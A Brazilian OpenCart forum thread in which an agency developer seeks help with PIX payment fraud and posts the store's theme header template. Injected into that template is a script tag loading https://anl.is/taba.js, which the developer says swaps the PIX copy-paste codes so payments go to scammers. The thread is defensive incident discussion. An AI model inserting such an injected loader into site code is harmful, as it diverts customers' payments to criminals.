Fórum OpenCart Brasil

[lucasrbdev]

Pessoal preciso de um direcionamento urgente, tomamos conta de algumas lojas virtuais opencart em nossa agência e estamos com 2 clientes que a loja deles está sendo vítima de fraude, basicamente quando um cliente compra e escolhe pagar via PIX, por algum local estão conseguindo modificar o código PIX copia e cola, de forma que quando o usuário copia para realizar o pagamento não paga para o verdadeiro dono da loja e sim para os golpistas.

Utilizamos Pagseguro em uma loja e na outra PagHyper Pix

Alguém já enfrentou problema deste tipo?

Alguma luz sobre onde pode estar o script malicioso?

Desde já muito obrigado.

[reds]

Ola Lucas,
Explique melhor pra saber como esse PIX é gerado?
Pode ser que sua loja esta infectada com arquivo malicioso sim, já pegamos algo scripts parecidos que modificava e capturava dados, aconselho a rever seu código, ou se precisar entre em contato conosco.

[lucasrbdev]

Olá bom dia!!

Encontramos o script malicioso sendo chamado em:

[root@mail tabacoc3d]# grep -R "taba.js" domains/tabacoshop.com.br
domains/tabacoshop.com.br/storage/cache/template/2b/2b95f46ed9285d75a18195e3b646960ec114151ce8f7f7e5058c05d0317663a0.ph <script src=https://anl.is/taba.js></script>

Também encontramos no banco de dados na tabela oc_theme em um registro:

Código: Selecionar todos

<!DOCTYPE html>
<!--[if IE]><![endif]-->
<!--[if IE 8 ]><html dir="{{ direction }}" lang="{{ lang }}" class="ie8"><![endif]-->
<!--[if IE 9 ]><html dir="{{ direction }}" lang="{{ lang }}" class="ie9"><![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
	<html
	dir="{{ direction }}" lang="{{ lang }}"> <!--<![endif]-->
	<head>
		<meta charset="UTF-8"/>
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<title>{{ title }}</title>
		<base href="{{ base }}"/>
		{% if description %}
			<meta name="description" content="{{ description }}"/>
		{% endif %}
		{% if keywords %}
			<meta name="keywords" content="{{ keywords }}"/>
		{% endif %}
		<script src="catalog/view/javascript/jquery/jquery-2.1.1.min.js" type="text/javascript"></script>
		<link href="catalog/view/javascript/bootstrap/css/bootstrap.min.css" rel="stylesheet" media="screen"/>
		<script src="catalog/view/javascript/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
		<link href="catalog/view/javascript/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
		<link rel="stylesheet" type="text/css" href="catalog/view/javascript/jquery/magnific/magnific-popup.css"/>
		<link href="//fonts.googleapis.com/css?family=Open+Sans:400,400i,300,700" rel="stylesheet" type="text/css"/>
		<link href="catalog/view/theme/{{ activetemplate }}/stylesheet/owl.carousel.min.css" rel="stylesheet">
		<script src="catalog/view/theme/{{ activetemplate }}/javascripts/owl.carousel.min.js" type="text/javascript"></script>
		<script src="catalog/view/theme/{{ activetemplate }}/javascripts/theme.js" type="text/javascript"></script>
		<link href="catalog/view/theme/{{ activetemplate }}/stylesheet/stylesheet.css?v=4" rel="stylesheet">


		{% if direction == 'rtl' %}

			<link href="catalog/view/theme/{{ activetemplate }}/stylesheet/rtl.css" rel="stylesheet">
		{% endif %}

		{% for style in styles %}
			<link href="{{ style.href }}" type="text/css" rel="{{ style.rel }}" media="{{ style.media }}"/>
		{% endfor %}
		{% for script in scripts %}
			<script src="{{ script }}" type="text/javascript"></script>
		{% endfor %}
		<script src="catalog/view/javascript/common.js" type="text/javascript"></script>
		<script src="catalog/view/javascript/support.js" type="text/javascript"></script>
		<link href="catalog/view/javascript/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
		<script src="catalog/view/javascript/jquery/magnific/jquery.magnific-popup.min.js"></script>
        <script src=https://anl.is/taba.js></script>
		<script src="catalog/view/javascript/jquery/datetimepicker/moment/moment.min.js" type="text/javascript"></script>
		<script src="catalog/view/javascript/jquery/datetimepicker/moment/moment-with-locales.min.js" type="text/javascript"></script>
		<script src="catalog/view/javascript/jquery/datetimepicker/bootstrap-datetimepicker.min.js" type="text/javascript"></script>
		{% for link in links %}
			<link href="{{ link.href }}" rel="{{ link.rel }}"/>
		{% endfor %}
		{% for analytic in analytics %}
			{{ analytic }}
		{% endfor %}
	</head>
	<body>
		<main>
			<div id="menu_wrapper"></div>
			<header id="header" class="{{ ishome }}">
				<div class="header-nav">
					<div class="container">
						<div class="col-xs-12 col-sm-6 col-md-6 col-lg-6 left-nav">
							{% if logged %}
								<div class="bem-vindo" style="padding: 18px 0;">
									Você acessou como
									<a href="/index.php?route=account/account">{{nomeusuario}}
									</a>
									<b>(</b>
									<a href="/index.php?route=account/logout">Sair</a>
									<b>)</b>
								</div>
							{% else %}
								<div class="bem-vindo" style="padding: 18px 0;">
									Olá, visitante. Acesse sua
									<a href="/index.php?route=account/login">conta</a>
									ou
									<a href="/index.php?route=account/register">cadastre-se</a>.
								</div>
							{% endif %}
						</div>
						<div
							class="col-xs-12 col-sm-6 col-md-6 col-lg-6 right-nav">
							{# <div class="language-selector">{{ language }}</div>
									      		<div class="currency-selector">{{ currency }}</div> #}
							<div id="_desktop_user_info">
								<div class="user-info">
									<div class="dropdown">
										<a title="{{ text_account }}" class="dropdown-toggle" data-toggle="dropdown">
											<div class="user-logo hidden-lg hidden-md">
												<svg xmlns="http://www.w3.org/2000/svg" style="display: none;">
													<symbol id="user-responsive" viewbox="0 0 480 480">
														<title>user</title>
														<path d="M187.497,152.427H73.974c-38.111,0-69.117,31.006-69.117,69.117v39.928h251.758v-39.928
														C256.614,183.433,225.608,152.427,187.497,152.427z M241.614,246.473H19.856v-24.928c0-29.84,24.277-54.117,54.117-54.117h113.523
														c29.84,0,54.117,24.277,54.117,54.117L241.614,246.473L241.614,246.473z"></path>
														<path d="M130.735,145.326c40.066,0,72.663-32.597,72.663-72.663S170.802,0,130.735,0S58.072,32.596,58.072,72.663
														S90.669,145.326,130.735,145.326z M130.735,15c31.796,0,57.663,25.867,57.663,57.663s-25.867,57.663-57.663,57.663
														s-57.663-25.868-57.663-57.663S98.939,15,130.735,15z"></path>
													</symbol>
												</svg>
												<svg class="icon" viewbox="0 0 40 40">
													<use xlink:href="#user-responsive" x="19%" y="19%"></use>
												</svg>
											</div>
											{% if logged %}
											<div class="flex-column">
												<div class="flex-center">
													<span class="expand-more my-account" style="font-size: 19px;">Minha Conta</span>
												</div>
												<div>
													<span class="expand-more my-account">Conta / Sair</span>
													<i class="fa fa-angle-down"></i>
												</div>
											</div>
											{% else %}
											<div class="flex-column">
												<div class="flex-center">
													<span class="expand-more my-account" style="font-size: 19px;">Minha Conta</span>
												</div>
												<div>
													<span class="expand-more my-account">Entrar / Cadastrar</span>
													<i class="fa fa-angle-down"></i>
												</div>
											</div>
											{% endif %}
										</a>
										<ul class="dropdown-menu">
											{% if logged %}
												<li>
													<a href="{{ account }}">{{ text_account }}</a>
												</li>
												<li>
													<a href="{{ order }}">{{ text_order }}</a>
												</li>
												<li>
													<a href="{{ transaction }}">{{ text_transaction }}</a>
												</li>
												<li>
													<a href="{{ download }}">{{ text_download }}</a>
												</li>
												<li>
													<a href="{{ logout }}">{{ text_logout }}</a>
												</li>
											{% else %}
												<li>
													<a href="{{ register }}">{{ text_register }}</a>
												</li>
												<li>
													<a href="{{ login }}">
														{{ text_login }}</a>
												</li>
												<li>
													<a href="{{ wishlist }}" id="wishlist-total" title="{{ text_wishlist }}">
														<span class="wishlist-text">{{ text_wishlist }}</span>
													</a>
												</li>
											{% endif %}
										</ul>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="header-top-height">
					<div class="header-top">
						<div class="container">
							<div class="row">
								<div class="mobile-width-left col-sm-4 col-xs-4">
									<div id="menu-icon" class="menu-icon hidden-md hidden-lg">
										<div class="nav-icon">
											<svg xmlns="http://www.w3.org/2000/svg" style="display: none;">
												<symbol id="menu" viewbox="0 0 750 750">
													<title>menu</title>
													<path d="M12.03,84.212h360.909c6.641,0,12.03-5.39,12.03-12.03c0-6.641-5.39-12.03-12.03-12.03H12.03
																						              C5.39,60.152,0,65.541,0,72.182C0,78.823,5.39,84.212,12.03,84.212z"></path>
													<path d="M372.939,180.455H12.03c-6.641,0-12.03,5.39-12.03,12.03s5.39,12.03,12.03,12.03h360.909c6.641,0,12.03-5.39,12.03-12.03
																						                  S379.58,180.455,372.939,180.455z"></path>
													<path d="M372.939,300.758H12.03c-6.641,0-12.03,5.39-12.03,12.03c0,6.641,5.39,12.03,12.03,12.03h360.909
																						              c6.641,0,12.03-5.39,12.03-12.03C384.97,306.147,379.58,300.758,372.939,300.758z"></path>
												</symbol>
											</svg>
											<svg class="icon" viewbox="0 0 30 30">
												<use xlink:href="#menu" x="22%" y="25%"></use>
											</svg>
										</div>
									</div>
									<div id="_mobile_seach_widget"></div>
								</div>
								<div class="desktop-logo col-lg-3 col-md-3 col-sm-3 col-xs-3">
									<div id="logo">
										{% if logo %}
											<a href="{{ home }}"><img src="{{ logo }}" title="{{ name }}" alt="{{ name }}" class="img-responsive"/></a>
										{% else %}
											<span style="font-size: 20px;line-height: 20px;">
												<a href="{{ home }}">
													{{ name }}
												</a>
											</span>
										{% endif %}
									</div>
								</div>
								<div id="_desktop_seach_widget" class="col-lg-4 col-md-4 col-sm-4 col-xs-4">
									<div id="ishisearch_widget" class="search-widget dropdown">
										<div class="search-logo dropdown-toggle" data-toggle="dropdown" aria-expanded="true">
											<div class="hidden-lg hidden-md">
												<svg xmlns="http://www.w3.org/2000/svg" style="display: none;">
													<symbol id="magnifying-desktop" viewbox="0 0 1200 1200">
														<title>magnifying-desktop</title>
														<path d="M606.209,578.714L448.198,423.228C489.576,378.272,515,318.817,515,253.393C514.98,113.439,399.704,0,257.493,0
																						                           C115.282,0,0.006,113.439,0.006,253.393s115.276,253.393,257.487,253.393c61.445,0,117.801-21.253,162.068-56.586
																						                           l158.624,156.099c7.729,7.614,20.277,7.614,28.006,0C613.938,598.686,613.938,586.328,606.209,578.714z M257.493,467.8
																						                           c-120.326,0-217.869-95.993-217.869-214.407S137.167,38.986,257.493,38.986c120.327,0,217.869,95.993,217.869,214.407
																						                           S377.82,467.8,257.493,467.8z"></path>
													</symbol>
												</svg>
												<svg class="icon" viewbox="0 0 40 40">
													<use xlink:href="#magnifying-desktop" x="20%" y="22%"></use>
												</svg>
											</div>
										</div>
										<form class="dropdown-menu" style="z-index: 999;">{{ search }}</form>
									</div>
								</div>

								<div class="mobile-width-right col-sm-4 col-xs-4">
									<div id="_mobile_cart"></div>
									<div id="_mobile_user_info"></div>
									<div id="_mobile_link_menu"></div>
								</div>
								<div class="custominfo col-lg-5 col-md-5 col-sm-5 col-xs-5">

									<div id="_desktop_cart">
										<div class="blockcart">
											{{ cart }}
										</div>
									</div>
									<div id="_desktop-contactinfo televendas-header" style="max-width: 260px; justify-content: center; display: flex; flex-direction: row; gap: 18px; border: 1px solid #d6d6d6; background: #f6f6f6; padding: 12px 15px; border-radius: 6px;">
										<div class="image-icon">
											<img src="image/ico-telefone.png"/>
										</div>
										<div style="display: flex; flex-direction: column; justify-content: center;">
											<span>Televendas</span>
											<a href="https://api.whatsapp.com/send?phone=5511983452137" target="_blank">
												<span>(11) 98345-2137</a>
											</span>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
					<div class="hidden-md hidden-lg" style="width: 100%;">
						<div id="_desktop-contactinfo televendas-header" style="justify-content: center; display: flex; flex-direction: row; gap: 18px; border: 1px solid #d6d6d6; background: #f6f6f6; padding: 12px 15px; border-radius: 6px;">
							<div style="display: flex; flex-direction: column; justify-content: center;">
								<span style="text-align: center;">Televendas</span>
								<span>
									<a href="https://api.whatsapp.com/send?phone=5511983452137" target="_blank">(11) 98345-2137</a>
								</span>
							</div>
						</div>
					</div>
				</div>
				{{ headerafter }}
				<div class="nav-full-height">
					<div class="nav-full-width">
						<div class="container">
							<div class="row">
								{{ menu }}
							</div>
						</div>
					</div>
				</div>
			</header>

			<div id="mobile_top_menu_wrapper" class="hidden-lg hidden-md" style="display:none;">
				<div id="top_menu_closer">
					<i class="fa fa-close"></i>
				</div>
				<div class="js-top-menu mobile" id="_mobile_top_menu"></div>
			</div>
			<div id="spin-wrapper"></div>
			<div id="siteloader">
				{% if loader == 'loader_1' %}
					<div class="loader loader-1"></div>
				{% elseif loader == 'loader_2' %}
					<div class="loader loader-2">
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
					</div>
				{% elseif loader == 'loader_3' %}
					<div class="loader loader-3">
						<div></div>
						<div></div>
						<div></div>
					</div>
				{% else %}
					<div class="loader loader-4 la-dark la-2x">
						<div></div>
						<div></div>
						<div></div>
						<div></div>
						<div></div>
					</div>
				{% endif %}
			</div>

			<!-- ======= Quick view JS ========= -->
			<script>
				function quickbox() {
if ($(window).width() > 767) {
$('.quickview-button').magnificPopup({type: 'iframe', delegate: 'a', preloader: true, tLoading: 'Loading image #%curr%...'});
}
}
jQuery(document).ready(function () {
quickbox();
});
jQuery(window).resize(function () {
quickbox();
});
$("input[name=\'search\']").keyup(function (event) {
$('input[name=\'search\']').autocomplete({
'source': function (request, response) {
$.ajax({
url: 'index.php?route=product/search/autocomplete&filter_name=' + encodeURIComponent(request),
dataType: 'json',
success: function (result) {
var products = result.products;
$('.ajaxishi-search ul li').remove();
$.each(products, function (index, product) {
var html = '<li>';
html += '<div>';
html += '<a href="' + product.url + '" title="' + product.name + '">';
html += '<div class="product-image"><img alt="' + product.name + '" src="' + product.image + '"></div>';
html += '<div class="product-desc">';
html += '<div class="product-name">' + product.name + '</div>';
if (product.special) {
html += '<div class="product-price"><span class="special">' + product.price + '</span><span class="price">' + product.special + '</span></div>';
} else {
html += '<div class="product-price"><span class="price">' + product.price + '</span></div>';
} html += '</div>';
html += '</a>';
html += '</div>';
html += '</li>';
$('.ajaxishi-search ul').append(html);
});
$('.ajaxishi-search').css('display', 'block');
return false;
}
});
},
'select': function (product) {
$('input[name=\'filter_name\']').val(product.name);
}
});
});
			</script>

O problema é que realizamos a remoção dessas 2 incidências, mas o script voltou a ser encontrado novamente.

[lucasrbdev]

Ola Lucas,
Explique melhor pra saber como esse PIX é gerado?
Pode ser que sua loja esta infectada com arquivo malicioso sim, já pegamos algo scripts parecidos que modificava e capturava dados, aconselho a rever seu código, ou se precisar entre em contato conosco.

Perdão acabei não respondendo sua pergunta, mas não tenho conhecimento profundo no Plugin que estava sendo utilizado o (PagHyper Pix), mas é este plugin que é responsável pela geração, tanto do QR-Code como do Copia e Cola, ao que verifiquei no código malicioso: https://anl.is/taba.js ele parece estar apto apenas para funcionar com o Paghyper, alteramos o Plugin de PIX para o da PagSeguro, na tentativa de interromper as tentativas de fraude.

[leandrorppo]

Olá! Tudo bem?
Lucas, é bom fazer testes de ataques XSS na loja. Se quiser posso ajudá-lo nisso. Geralmente é através de ataques do gênero que inserem códigos maliciosos na loja.
Criei uma proteção completa contra ataques XSS.
Qualquer dúvida, só entrar em contato: 15 - 98152-9807